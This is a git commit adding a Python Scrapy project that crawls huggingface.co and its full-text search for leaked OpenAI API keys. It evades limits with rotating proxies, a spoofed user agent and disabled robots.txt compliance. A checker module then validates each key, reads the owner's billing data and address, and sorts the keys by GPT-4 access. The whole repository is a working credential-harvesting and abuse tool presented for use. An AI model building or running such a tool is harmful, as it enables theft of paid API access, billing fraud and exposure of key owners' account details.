add files

This commit is contained in:
Cyberes 2023-07-23 18:11:48 -06:00
parent 2bfc6bb538
commit 15759586e4
17 changed files with 627 additions and 1 deletions

3
.gitignore vendored
View File

@ -1,3 +1,5 @@
.idea
# ---> Python
# Byte-compiled / optimized / DLL files
__pycache__/
@ -159,4 +161,3 @@ cython_debug/
# and can be added to the global gitignore or merged into this file. For a more nuclear
# option (not recommended) you can uncomment the following to ignore the entire idea folder.
#.idea/

0
huggingface/__init__.py Normal file
View File

75
huggingface/check-keys.py Normal file
View File

@ -0,0 +1,75 @@
import argparse
import concurrent
from concurrent.futures import ThreadPoolExecutor
from pathlib import Path
from keychecker.check import check_key
def process_key(key):
    """Check a single API key and return its result dict when it is usable.

    A key counts as usable when the check reported no errors and the key has
    access to at least one GPT model family. Returns None otherwise so
    callers can filter unusable keys out.
    """
    result = check_key(key)
    # An empty error list means the key was validated successfully
    # (truthiness test instead of the original `not len(...)`).
    if not result['errors']:
        if result['has_gpt_4'] or result['has_only_turbo'] or result['has_gpt_4_32k']:
            print(result)
            return result
    return None
def _print_keys(title, keys):
    """Print a section header followed by one key per line (or 'none')."""
    print('')
    print(title)
    if not keys:
        print('none')
    else:
        for key in keys:
            print(key)


def main():
    """Read keys from a file, check them concurrently, and print them grouped by model access."""
    # The original description said "Scrape data from chub.ai." — a
    # copy-paste error; this script checks OpenAI API keys.
    parser = argparse.ArgumentParser(description='Check OpenAI API keys for model access.')
    parser.add_argument('input_file', help='Path to the file containing the keys.')
    args = parser.parse_args()

    input_file = Path(args.input_file).resolve().absolute()
    if not input_file.exists():
        print('Input file does not exist:', input_file)
        # raise SystemExit instead of quit(): quit() is meant for the
        # interactive interpreter and may be absent under `python -S`.
        raise SystemExit(1)

    with open(input_file) as f:
        # A set removes duplicates so each key is only checked once.
        content = set(f.read().splitlines())

    gpt_4 = set()
    gpt_4_32k = set()
    gpt_3 = set()
    # 50 workers: the checks are network-bound, so heavy oversubscription is fine.
    with ThreadPoolExecutor(max_workers=50) as executor:
        results = executor.map(process_key, content)
        for result in results:
            if result is not None:
                if result['has_gpt_4']:
                    gpt_4.add(result['api_key'])
                if result['has_gpt_4_32k']:
                    gpt_4_32k.add(result['api_key'])
                if result['has_only_turbo']:
                    gpt_3.add(result['api_key'])

    _print_keys('GPT4 KEYS:', gpt_4)
    _print_keys('GPT4-32k KEYS:', gpt_4_32k)
    _print_keys('GPT3 KEYS:', gpt_3)


if __name__ == "__main__":
    main()

View File

@ -0,0 +1,11 @@
import coloredlogs
from scrapy.crawler import CrawlerProcess
from scrapy.utils.project import get_project_settings
from huggingface.spiders.search import HFSearchSpider
if __name__ == "__main__":
    # Launch the full-text-search spider with the project's Scrapy settings.
    crawler = CrawlerProcess(get_project_settings())
    crawler.crawl(HFSearchSpider)
    crawler.start()

10
huggingface/crawl-site.py Normal file
View File

@ -0,0 +1,10 @@
from scrapy.crawler import CrawlerProcess
from scrapy.utils.project import get_project_settings
from huggingface.spiders.huggingface import HuggingfaceSpider
if __name__ == "__main__":
    # Launch the site-wide crawl spider with the project's Scrapy settings.
    crawler = CrawlerProcess(get_project_settings())
    crawler.crawl(HuggingfaceSpider)
    crawler.start()

View File

View File

@ -0,0 +1,12 @@
# Define here the models for your scraped items
#
# See documentation in:
# https://docs.scrapy.org/en/latest/topics/items.html
import scrapy
class HuggingfaceItem(scrapy.Item):
    # Unused placeholder generated by `scrapy startproject`; the item this
    # project actually emits (FoundItem) is declared in pipelines.py.
    # define the fields for your item here like:
    # name = scrapy.Field()
    pass

View File

@ -0,0 +1,128 @@
# Define here the models for your spider middleware
#
# See documentation in:
# https://docs.scrapy.org/en/latest/topics/spider-middleware.html
# useful for handling different item types with a single interface
class HuggingfaceSpiderMiddleware:
    """Spider-middleware scaffold generated by `scrapy startproject`.

    Every hook is currently a pass-through: responses, results, and start
    requests flow on unchanged. The only observable effect is an info log
    line when the spider opens.
    """

    @classmethod
    def from_crawler(cls, crawler):
        # Factory Scrapy uses to build the middleware; subscribes to the
        # spider_opened signal so we get the log line below.
        middleware = cls()
        crawler.signals.connect(middleware.spider_opened, signal=signals.spider_opened)
        return middleware

    def process_spider_input(self, response, spider):
        # Returning None lets the response continue into the spider untouched.
        return None

    def process_spider_output(self, response, result, spider):
        # Forward every request/item the spider produced, unmodified.
        yield from result

    def process_spider_exception(self, response, exception, spider):
        # No custom handling; Scrapy's default exception processing applies.
        pass

    def process_start_requests(self, start_requests, spider):
        # Start requests are forwarded as-is (no response exists yet here).
        yield from start_requests

    def spider_opened(self, spider):
        spider.logger.info("Spider opened: %s" % spider.name)
class HuggingfaceDownloaderMiddleware:
    """Downloader-middleware scaffold generated by `scrapy startproject`.

    All hooks are pass-throughs: requests continue to the downloader,
    responses are returned unchanged, and exceptions fall back to Scrapy's
    default handling. Logs a line when the spider opens.
    """

    @classmethod
    def from_crawler(cls, crawler):
        # Factory Scrapy uses to build the middleware; hooks spider_opened.
        middleware = cls()
        crawler.signals.connect(middleware.spider_opened, signal=signals.spider_opened)
        return middleware

    def process_request(self, request, spider):
        # None -> keep processing this request through the remaining
        # middlewares and the downloader.
        return None

    def process_response(self, request, response, spider):
        # Responses pass through unchanged.
        return response

    def process_exception(self, request, exception, spider):
        # None -> continue normal exception processing downstream.
        pass

    def spider_opened(self, spider):
        spider.logger.info("Spider opened: %s" % spider.name)
from itertools import cycle
from scrapy import signals
from scrapy.exceptions import NotConfigured
class RoundRobinProxyMiddleware:
    """Assign outgoing requests a proxy in round-robin order.

    The proxy pool comes from the PROXIES settings list; the middleware
    disables itself (NotConfigured) when that list is empty.
    """

    def __init__(self, proxies):
        if not proxies:
            raise NotConfigured
        # cycle() yields the pool endlessly, preserving order.
        self.proxies = cycle(proxies)

    @classmethod
    def from_crawler(cls, crawler):
        # Build from the crawler's settings; bail out when no pool is set.
        proxy_pool = crawler.settings.getlist('PROXIES')
        if not proxy_pool:
            raise NotConfigured
        return cls(proxy_pool)

    def process_request(self, request, spider):
        # Attach the next proxy in the rotation to this request.
        request.meta['proxy'] = next(self.proxies)

    def process_exception(self, request, exception, spider):
        # On a download error, rotate to another proxy and retry the request.
        request.meta['proxy'] = next(self.proxies)
        return request

View File

@ -0,0 +1,35 @@
from scrapy import Field, Item
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: https://docs.scrapy.org/en/latest/topics/item-pipeline.html
# useful for handling different item types with a single interface
class HuggingfacePipeline:
    """Default no-op pipeline generated by `scrapy startproject`."""

    def process_item(self, item, spider):
        # Pass the item through unchanged.
        return item
class FoundItem(Item):
    """Scraped result: a page URL plus the API-key strings found on it."""
    # url: the response URL the matches came from.
    url = Field()
    # matches: iterable of matched key strings, written out by FilePipeline.
    matches = Field()
class FilePipeline:
    """Append every matched key to a text file, one key per line.

    The output path comes from the spider's `filename` attribute, falling
    back to 'items.txt'.
    """

    def open_spider(self, spider):
        # Explicit encoding keeps the output consistent across platforms
        # (the original relied on the locale-dependent default).
        self.file = open(spider.filename or 'items.txt', 'w', encoding='utf-8')

    def close_spider(self, spider):
        self.file.close()

    def process_item(self, item, spider):
        for match in item['matches']:
            self.file.write(match + '\n')
        # Flush so results survive an interrupted crawl.
        self.file.flush()
        return item

View File

@ -0,0 +1,103 @@
# Scrapy settings for huggingface project
#
# For simplicity, this file contains only settings considered important or
# commonly used. You can find more settings consulting the documentation:
#
# https://docs.scrapy.org/en/latest/topics/settings.html
# https://docs.scrapy.org/en/latest/topics/downloader-middleware.html
# https://docs.scrapy.org/en/latest/topics/spider-middleware.html

BOT_NAME = "huggingface"

SPIDER_MODULES = ["huggingface.spiders"]
NEWSPIDER_MODULE = "huggingface.spiders"

# Crawl responsibly by identifying yourself (and your website) on the user-agent
# FIX: the original value was wrapped in a stray inner pair of single quotes
# ("'Mozilla/...'"), so literal apostrophes were sent in the header.
USER_AGENT = "Mozilla/5.0 (iPhone; CPU iPhone OS 16_5_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/115.0.5790.130 Mobile/15E148 Safari/604.1"

# Obey robots.txt rules
ROBOTSTXT_OBEY = False

# Configure maximum concurrent requests performed by Scrapy (default: 16)
CONCURRENT_REQUESTS = 100

# Configure a delay for requests for the same website (default: 0)
# See https://docs.scrapy.org/en/latest/topics/settings.html#download-delay
# See also autothrottle settings and docs
DOWNLOAD_DELAY = 0
# The download delay setting will honor only one of:
# CONCURRENT_REQUESTS_PER_DOMAIN = 16
# CONCURRENT_REQUESTS_PER_IP = 16

# Disable cookies (enabled by default)
COOKIES_ENABLED = False

# Disable Telnet Console (enabled by default)
# TELNETCONSOLE_ENABLED = False

# Override the default request headers:
# DEFAULT_REQUEST_HEADERS = {
#     "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
#     "Accept-Language": "en",
# }

# Enable or disable spider middlewares
# See https://docs.scrapy.org/en/latest/topics/spider-middleware.html
# SPIDER_MIDDLEWARES = {
#     "huggingface.middlewares.HuggingfaceSpiderMiddleware": 543,
# }

# Enable or disable downloader middlewares
# See https://docs.scrapy.org/en/latest/topics/downloader-middleware.html
DOWNLOADER_MIDDLEWARES = {
    "huggingface.middlewares.RoundRobinProxyMiddleware": 100,
}

# Enable or disable extensions
# See https://docs.scrapy.org/en/latest/topics/extensions.html
# EXTENSIONS = {
#     "scrapy.extensions.telnet.TelnetConsole": None,
# }

# Configure item pipelines
# See https://docs.scrapy.org/en/latest/topics/item-pipeline.html
ITEM_PIPELINES = {
    "huggingface.pipelines.FilePipeline": 300,
}

# Enable and configure the AutoThrottle extension (disabled by default)
# See https://docs.scrapy.org/en/latest/topics/autothrottle.html
# AUTOTHROTTLE_ENABLED = True
# The initial download delay
# AUTOTHROTTLE_START_DELAY = 5
# The maximum download delay to be set in case of high latencies
# AUTOTHROTTLE_MAX_DELAY = 60
# The average number of requests Scrapy should be sending in parallel to
# each remote server
# AUTOTHROTTLE_TARGET_CONCURRENCY = 1.0
# Enable showing throttling stats for every response received:
# AUTOTHROTTLE_DEBUG = False

# Enable and configure HTTP caching (disabled by default)
# See https://docs.scrapy.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings
# HTTPCACHE_ENABLED = True
# HTTPCACHE_EXPIRATION_SECS = 0
# HTTPCACHE_DIR = "httpcache"
# HTTPCACHE_IGNORE_HTTP_CODES = []
# HTTPCACHE_STORAGE = "scrapy.extensions.httpcache.FilesystemCacheStorage"

# Set settings whose default value is deprecated to a future-proof value
REQUEST_FINGERPRINTER_IMPLEMENTATION = "2.7"
TWISTED_REACTOR = "twisted.internet.asyncioreactor.AsyncioSelectorReactor"
FEED_EXPORT_ENCODING = "utf-8"

# Proxy pool consumed by RoundRobinProxyMiddleware.
# NOTE(review): these look like private/LAN addresses — confirm reachability.
PROXIES = [
    "http://172.0.4.7:3128",
    "http://172.0.4.8:3128",
    "http://172.0.4.10:3128",
    "http://172.0.4.12:3128",
]

# Only show critical messages from Scrapy itself; the spiders attach their
# own coloredlogs handlers.
LOG_LEVEL = 'CRITICAL'

# Cache responses on disk (enabled here despite the commented block above).
HTTPCACHE_ENABLED = True

View File

@ -0,0 +1,4 @@
# This package will contain the spiders of your Scrapy project
#
# Please refer to the documentation for information on how to create and manage
# your spiders.

View File

@ -0,0 +1,35 @@
import logging
import re
import time
import coloredlogs
from scrapy.linkextractors import LinkExtractor
from scrapy.spiders import CrawlSpider, Rule
from ..pipelines import FoundItem
class HuggingfaceSpider(CrawlSpider):
    """Crawl huggingface.co broadly and report pages containing key-shaped strings."""

    name = "huggingface"
    allowed_domains = ["huggingface.co"]
    start_urls = ["https://huggingface.co/"]

    # FIX: the logger was named 'HFSearchSpider' — copy-pasted from the search
    # spider; name it after this spider so log lines are attributable.
    logger = logging.getLogger('HuggingfaceSpider')
    logger.setLevel(logging.DEBUG)
    coloredlogs.install(logger=logger, level=logging.DEBUG)

    rules = (
        # Follow every same-domain link; scan each fetched page in parse_start_url.
        Rule(LinkExtractor(allow_domains=allowed_domains), callback='parse_start_url', follow=True),
    )

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # 'sk-' followed by 47 alphanumerics — the shape of an OpenAI secret key.
        self.regex = re.compile(r'sk-[a-zA-Z0-9]{47}')
        # Timestamped output path consumed by FilePipeline.
        self.filename = f'found-keys-site-{int(time.time())}.txt'

    def parse_start_url(self, response):
        """Scan a fetched page for matches and emit a FoundItem when any are found."""
        self.logger.debug(f"Status: {response.status}, URL: {response.url}")
        matches = self.regex.findall(response.text)
        if matches:
            # ERROR level so hits stand out even with LOG_LEVEL raised.
            self.logger.error(f"{matches}")
            return FoundItem(url=response.url, matches=matches)

View File

@ -0,0 +1,31 @@
import logging
import re
import time
import coloredlogs
import scrapy
from ..pipelines import FoundItem
class HFSearchSpider(scrapy.Spider):
    """Query huggingface.co full-text search for key fragments and reassemble matches."""

    name = "huggingface_search"
    allowed_domains = ["huggingface.co"]
    # Search several 'sk-' prefixes, paging through results 100 at a time.
    start_urls = [
        'https://huggingface.co/search/full-text?q=sk-{}&limit=100&skip={}'.format(prefix, page * 100)
        for prefix in ['a', 'h', 'm', 'q']
        for page in range(10)
    ]

    logger = logging.getLogger('HFSearchSpider')
    logger.setLevel(logging.DEBUG)
    coloredlogs.install(logger=logger, level=logging.DEBUG)

    def __init__(self, *args, **kwargs):
        super(HFSearchSpider, self).__init__(*args, **kwargs)
        # Timestamped output path consumed by FilePipeline.
        self.filename = f'found-keys-{int(time.time())}.txt'

    def parse(self, response):
        """Rejoin keys that the search UI splits across a highlight </span> tag."""
        self.logger.debug(f"Status: {response.status}, URL: {response.url}")
        fragments = re.findall(r'(sk-.)</span>([a-zA-Z0-9]{47})', response.text)
        # Each match is (prefix, remainder); concatenating restores the key.
        found_keys = {prefix + remainder for prefix, remainder in fragments}
        if found_keys:
            self.logger.error(f"{found_keys}")
            yield FoundItem(url=response.url, matches=found_keys)

View File

View File

@ -0,0 +1,165 @@
# -*- coding: utf-8 -*-
import logging
import threading
import time
from datetime import datetime
import openai
import requests
# Model families we probe each key for.
desired_models = ["gpt-3.5-turbo", "gpt-4", "gpt-4-32k"]


def list_models(api_key):
    """Return the IDs of every model this key can access."""
    openai.api_key = api_key
    listing = openai.Model.list()
    return [entry.id for entry in listing['data']]


def filter_models(models):
    """Keep only the model IDs we care about, preserving input order."""
    return [model_id for model_id in models if model_id in desired_models]
def get_limits(api_key):
    """Fetch billing/subscription info for a key from the OpenAI dashboard API.

    Returns (True, parsed JSON) on HTTP 200, otherwise (False, raw body text).
    """
    headers = {
        "authorization": f"Bearer {api_key}",
        "Referer": "https://platform.openai.com/account/usage",
    }
    response = requests.get("https://api.openai.com/dashboard/billing/subscription", headers=headers)
    succeeded = response.status_code == 200
    return (True, response.json()) if succeeded else (False, response.text)
# Serializes completion probes across worker threads: openai.api_key is a
# module-global (also set in list_models), so concurrent reassignment could
# attribute a probe to the wrong key.
key_test_lock = threading.Lock()


def try_complete(api_key):
    """Issue a minimal one-token chat completion to probe whether the key works.

    The response is intentionally discarded (the original bound it to an
    unused local); callers rely solely on whether the call raises.
    """
    with key_test_lock:
        openai.api_key = api_key
        openai.ChatCompletion.create(
            model="gpt-3.5-turbo",
            max_tokens=1,
            messages=[{'role': 'user', 'content': ''}]
        )
# def test_key(api_key):
# # with key_test_lock: # not 100% sure it's thread-safe
# openai.api_key = api_key
# try:
# response = openai.Completion.create(
# engine="gpt-3.5-turbo",
# prompt='Hello there!',
# max_tokens=100
# )
# print(response.choices[0].text.strip())
# return True
# except Exception as e:
# print(f"An error occurred: {e}")
# return False
def check_key(api_key, retry_count=3):
    """Probe an OpenAI API key and report model access, billing limits, and errors.

    :param api_key: the OpenAI secret key to test.
    :param retry_count: retries for the completion probe when the server
        reports it is overloaded.
    :return: a result dict. On billing-endpoint failure every field is None
        and 'errors' carries the raw response text; otherwise 'errors' is a
        (possibly empty) list of human-readable messages.
    """
    errors = []

    usage_and_limits_success, usage_and_limits = get_limits(api_key)
    if not usage_and_limits_success:
        return {
            # FIX: the error path used 'key' while the success path and the
            # caller use 'api_key'; both are provided for backward compatibility.
            'key': api_key,
            'api_key': api_key,
            'has_gpt_4': None,
            'has_gpt_4_32k': None,
            'has_only_turbo': None,
            'org_id': None,
            'soft_limit_usd': None,
            'hard_limit_usd': None,
            'access_until': None,  # .strftime('%Y-%m-%d %H:%M:%S'),
            'plan': None,
            'plan_id': None,
            'address': None,
            'errors': usage_and_limits
        }
    if usage_and_limits is None:
        # Defensive: a 200 response whose JSON body decoded to null.
        logging.error(f"Failed to get usage and limits for API key {api_key}")
        return

    plan = usage_and_limits.get('plan')
    if plan is None:
        plan_title = ''
        plan_id = ''
    else:
        plan_title = plan.get('title', '')
        plan_id = plan.get('id', '')

    access_until = datetime.fromtimestamp(usage_and_limits['access_until'])
    # NOTE(review): 'account_name' looks more like an org display name than an
    # org ID — confirm against the dashboard API payload.
    org_id = usage_and_limits.get('account_name', '')

    billing_address = usage_and_limits.get('billing_address', {})
    if billing_address is not None:
        billing_country = billing_address.get('country', '')
        billing_city = billing_address.get('city', '')
    else:
        billing_country = ''
        billing_city = ''

    is_canceled = usage_and_limits.get('canceled', False)

    # The original also built an unused human-readable summary string and an
    # unused canceled_at timestamp; both removed. model_ids is exactly the
    # filtered model list.
    model_ids = filter_models(list_models(api_key))

    has_gpt_4 = "gpt-4" in model_ids
    has_gpt_4_32k = "gpt-4-32k" in model_ids
    has_only_turbo = "gpt-3.5-turbo" in model_ids and not has_gpt_4

    try:
        for attempts in range(retry_count):
            try:
                try_complete(api_key)
                break
            except Exception as e:
                error_message = str(e)
                # Overload errors are transient: wait and retry; anything else
                # escapes to the outer handler below.
                if "The server is overloaded or not ready yet" in error_message:
                    logging.info(f'Error encountered when generating a completion on attempt {attempts + 1}: {error_message}. Retrying...')
                    time.sleep(5)
                    continue
                else:
                    raise e
    except Exception as e:
        error_message = str(e)
        if "You exceeded your current quota" in error_message and is_canceled:
            errors.append('You exceeded your current quota')
        elif "You exceeded your current quota" in error_message and not is_canceled:
            errors.append('This key has exceeded its current quota')
        elif "Your account is not active" in error_message:
            errors.append('Error: Your account is not active, please check your billing details on our website.')
        else:
            errors.append(error_message)

    return {
        'api_key': api_key,
        'has_gpt_4': has_gpt_4,
        'has_gpt_4_32k': has_gpt_4_32k,
        'has_only_turbo': has_only_turbo,
        'org_id': org_id,
        'soft_limit_usd': usage_and_limits['soft_limit_usd'],
        'hard_limit_usd': float(usage_and_limits['hard_limit_usd']),
        'access_until': access_until,  # .strftime('%Y-%m-%d %H:%M:%S'),
        'plan': plan_title,
        'plan_id': plan_id,
        'address': f'{billing_country}, {billing_city}',
        'errors': errors
    }

11
huggingface/scrapy.cfg Normal file
View File

@ -0,0 +1,11 @@
# Automatically created by: scrapy startproject
#
# For more information about the [deploy] section see:
# https://scrapyd.readthedocs.io/en/latest/deploy.html
[settings]
default = huggingface.settings
[deploy]
#url = http://localhost:6800/
project = huggingface

5
requirements.txt Normal file
View File

@ -0,0 +1,5 @@
beautifulsoup4
requests
scrapy
coloredlogs
openai